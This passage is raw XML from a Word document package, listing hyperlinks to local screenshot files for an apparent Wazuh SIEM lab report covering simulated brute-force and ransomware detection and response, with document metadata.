Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_4_wazuh_install.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId36" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_5_wazuh_agent_active.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId40" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_6_wazuh_dashboard.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId53" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_1_reconnaissance.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId58" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_2_brute_force.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId63" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_3_bruteforce_logged.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId68" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_4_ransomware_attack.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId74" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_5_attack_logged_fim.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId79" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_6_attack_logged_rule100100.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId84" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_7_attack_logged_mitre_framework.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId89" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_8_attack_logged_mitre_dashboard.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId95" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_1_containment.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId99" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_2_removing_access.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId104" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_3_decrypting_files.png" TargetMode="External" /></Relationships>
</file>

<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId19" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_1_ubuntu_wazuh.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_2_windows_victim.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_3_kali_attack.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId32" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_4_wazuh_install.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId36" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_5_wazuh_agent_active.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId40" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_2_6_wazuh_dashboard.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId53" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_1_reconnaissance.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId58" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_2_brute_force.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId63" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_3_bruteforce_logged.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId68" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_4_ransomware_attack.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId74" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_5_attack_logged_fim.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId79" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_6_attack_logged_rule100100.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId84" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_7_attack_logged_mitre_framework.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId89" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_8_attack_logged_mitre_dashboard.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId95" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_1_containment.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId99" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_2_removing_access.png" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId104" Target="file:///C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_3_decrypting_files.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2026-11-01T08:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-11-01T08:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>